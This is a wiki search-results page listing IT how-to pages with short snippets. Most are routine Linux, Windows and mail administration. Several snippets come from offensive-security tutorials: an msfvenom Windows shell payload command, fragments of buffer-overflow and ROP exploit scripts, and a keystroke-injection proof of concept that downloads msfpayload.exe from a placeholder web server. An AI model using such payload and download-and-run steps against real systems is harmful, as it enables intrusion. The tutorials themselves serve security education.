file

Suche

Unten sind die Ergebnisse Ihrer Suche gelistet.

Shellcode Injection Part 1 @en:it-security:blog
13 Treffer, Zuletzt geändert:
cesses and some techniques for obfuscating binary files. In the first part, we look at how to inject she... es it as a threat. You can find all the required files in the [[en:it-security:blog:shellcode_injection... should be in C format | | > shell.c | Save to the file shell.c | <code bash> msfvenom -p windows/shell_... tes. We take this from the ''msfvenom'' output. <file cpp local-process-injection.cpp> #include <stdio.
Buffer overflow in the 64-bit stack - Part 3 @en:it-security:blog
15 Treffer, Zuletzt geändert:
h>psycore8/nosoc-bof/tree/main/part-3|Github]]. <file c bof-part3.c> /* Code https://blog.techorganic.c... setbuf(stdout, 0); vuln(); return 0; } </file> \\ \\ ===== Debug ===== {{page>en:vorlagen:att... s write a first exploit to ''write()'' to leak. <file python buf3-stage1.py> #!/usr/bin/env python fro... # POP Argumente buf += p64(constants.STDOUT_FILENO) # stdout buf += p64(bin.got[b'write'])
Buffer overflow in the 64-bit stack - part 1 @en:it-security:blog
3 Treffer, Zuletzt geändert:
The Shellcode((http://shell-storm.org/shellcode/files/shellcode-77.html)) is stored in an environment ... ==== First we set root rights to the vulnerable file and start it((https://blog.techorganic.com/2015/0... bof-dism-5.png?600|root Shell!}}] \\ \\ ^ Project files | {{ it-security:nosoc-repo-bof64.zip |}}<label
Buffer overflow in the 64-bit stack - Part 2 @en:it-security:blog
5 Treffer, Zuletzt geändert:
per and display the gadgets <code bash> ropper --file bof-part2 ... 0x000000000040116a: pop rdi; ret; .... ll need 2 offsets for the exploit. So we load our file into the debugger and start it: <code bash> gdb-... === Now we run our Python exploit and create the file in.txt. <code bash>python2 buffer.py</code> \\ \\ ==== Set authorisations ==== Our file still needs the appropriate root permissions. <c
Privilege escalation: Windows admin thanks to Linux @en:it-security:blog
1 Treffer, Zuletzt geändert:
]] After the download you have to port the image file to a bootable USB stick or DVD. To ensure that th
FatCat Attack PoC @en:it-security:blog
1 Treffer, Zuletzt geändert:
ttps://<DEIN-COOLER-WEBSERVER>/msfpayload.exe -OutFile msfpayload.exe DELAY 3000 ENTER DELAY 5000 STRING
The importance of awareness in IT security @en:it-security:blog
2 Treffer, Zuletzt geändert:
romised. The trigger was a double-click on an ISO file that was sent as an attachment in an email. Windo... k methods === In this particular example, an ISO file was included. This is only symbolic for the time
Execute repair of Windows 10 @en:windows
3 Treffer, Zuletzt geändert:
or installed programmes, but only repairs system files. However, this method is quite time-consuming. ... * Switch to the Sources folder * Search for the file setupprep.exe * Execute the file * Follow the instructions and run the setup
Disable User Account Control (UAC) completely @en:windows
3 Treffer, Zuletzt geändert:
Alternative ==== Save and execute the following file by double-clicking on it. Confirm the query(s) and restart. <file reg EnableLUA.reg> Windows Registry Editor Versio... ion\Policies\System] "EnableLUA"=dword:00000000 </file> ===== Deactivating via PowerShell ===== <code
Start Registry Editor @en:windows
2 Treffer, Zuletzt geändert:
advisable to create a data backup: - Click on "File" - "Export" - Specify a target file ===== Screenshot ===== {{windows:regedit.jpg|}} ===== Furthe
Wallabag installation under Debian @en:linux
12 Treffer, Zuletzt geändert:
S:!DH:!AES128 SSLVerifyDepth 10 SSLCertificateFile /etc/letsencrypt/live/wallabag.domain.tld/cert.pem SSLCertificateKeyFile /etc/letsencrypt/live/wallabag.domain.tld/privkey.pem SSLCACertificateFile /etc/letsencrypt/live/wallabag.domain.tld/chain.pem SSLCertificateChainFile /etc/letsencrypt/live/wallabag.domain.tld/fullcha
Backing up the sshd @en:linux
8 Treffer, Zuletzt geändert:
096 Generating public/private rsa key pair. Enter file in which to save the key (/home/user/.ssh/id_rsa)... <code bash>$ wipe id_rsa Okay to WIPE 1 regular file ? (Yes/No) yes Operation finished. 1 file wiped and 0 special files ignored in 0 directories, 0 symlinks removed but not followed, 0 errors occur
Postfix Virtual Mailbox Limit @en:linux
2 Treffer, Zuletzt geändert:
nfiguration. ===== Troubleshooting ===== In the file <code text> /etc/postfix/main.cf </code> file, the following entry must be added: <code text> virtua
Integration of Collabora Office in OwnCloud @en:linux
4 Treffer, Zuletzt geändert:
use Lets Encrypt! SSLEngine on SSLCertificateFile /etc/letsencrypt/live/collabora.yourdomain.de/cert.pem SSLCertificateKeyFile /etc/letsencrypt/live/collabora.yourdomain.de/privkey.pem SSLCACertificateFile /etc/letsencrypt/live/collabora.yourdomain.de/chain.pem SSLCertificateChainFile /etc/letsencrypt/live/collabora.yourdomain.de/ful
n8n installation with Docker Compose @en:linux
2 Treffer, Zuletzt geändert:
R_SERVER> </code> ===== 4. create Docker Compose file ===== <code>/somedirectory/docker-compose.yml</c... node/.n8n </code> </hidden> ===== 5. create .env file ===== <code>/somedirectory/n8n/.env</code> <cod
Kali Linuxc: apt error - File has unexpected size @en:linux
2 Treffer, Zuletzt geändert:
Update UnrealIRCD @en:linux
9 Treffer, Zuletzt geändert:
Set up iptables @en:linux
4 Treffer, Zuletzt geändert:
Linux Commands Cheatsheet @en:linux
12 Treffer, Zuletzt geändert:
Backup Script Linux @en:linux
3 Treffer, Zuletzt geändert:
Helpful NMAP scanner commands @en:it-security
3 Treffer, Zuletzt geändert:
Secure passwords @en:it-security
1 Treffer, Zuletzt geändert:
mIRC with SSL @en:irc
1 Treffer, Zuletzt geändert:
Set up iptables @en:linux:firewall
4 Treffer, Zuletzt geändert:
Hibernation in the Remote Desktop @en:windows
1 Treffer, Zuletzt geändert:
Password Manager @en:archiv:software
2 Treffer, Zuletzt geändert:
Emulated Debian under VMWare @en:linux
1 Treffer, Zuletzt geändert:
MySQL Backup under Linux @en:linux:mysql
2 Treffer, Zuletzt geändert:
Security on the net @en:tut
1 Treffer, Zuletzt geändert:
Wallabag installation under Debian @en:linux:wallabag
12 Treffer, Zuletzt geändert:
Windows XP Mode for Windows 7 Home @en:archiv:windows:vista
4 Treffer, Zuletzt geändert:
Move swap file under XP @en:archiv:windows:performance
11 Treffer, Zuletzt geändert:
Execute repair of Windows 10 @en:windows:10
3 Treffer, Zuletzt geändert:
Courier with TLS connection @en:linux:courier
2 Treffer, Zuletzt geändert:
Password Manager @en:software:passwort_manager
1 Treffer, Zuletzt geändert:
ChaosDLL mIRC Script @en:software:chaosdll
9 Treffer, Zuletzt geändert:
Debian Fileserver with Samba @en:linux:samba
3 Treffer, Zuletzt geändert:
Windows Security - Basics @en:windows:security
3 Treffer, Zuletzt geändert:
NTLDR missing Error message @en:windows
2 Treffer, Zuletzt geändert:
Set up SSL under Apache @en:linux:apache
3 Treffer, Zuletzt geändert:
Formatting Syntax @en:wiki
32 Treffer, Zuletzt geändert:
Template for user profile @en:vorlagen
1 Treffer, Zuletzt geändert:
Debian Distribution Upgrade - Squeeze to Wheezy @en:linux:debian
1 Treffer, Zuletzt geändert:
DelLastXFiles - delete data chronologically @en:software
16 Treffer, Zuletzt geändert:
n8n installation with Docker Compose @en:linux:n8n
2 Treffer, Zuletzt geändert:
Reset the registry at an earlier point in time @en:windows
4 Treffer, Zuletzt geändert:
Start Registry Editor @en:windows:essentials
2 Treffer, Zuletzt geändert:
PsyCore
1 Treffer, Zuletzt geändert:
Integration of Collabora Office in OwnCloud @en:linux:owncloud
4 Treffer, Zuletzt geändert:
Postfix trivial rewrite problem @en:linux
2 Treffer, Zuletzt geändert:
IRC Operator commands @en:irc
11 Treffer, Zuletzt geändert:
Linux backup with tar @en:linux:backup
9 Treffer, Zuletzt geändert:
Kali Linuxc: apt error - File has unexpected size @en:linux:kali
2 Treffer, Zuletzt geändert:
MySQL Operating system error number 13 @en:linux:mysql
6 Treffer, Zuletzt geändert:
Linux backup with rsync @en:linux:backup
9 Treffer, Zuletzt geändert:
Backup Script for Windows @en:software
7 Treffer, Zuletzt geändert:
Windows Bluescreen Analysis @en:windows
3 Treffer, Zuletzt geändert: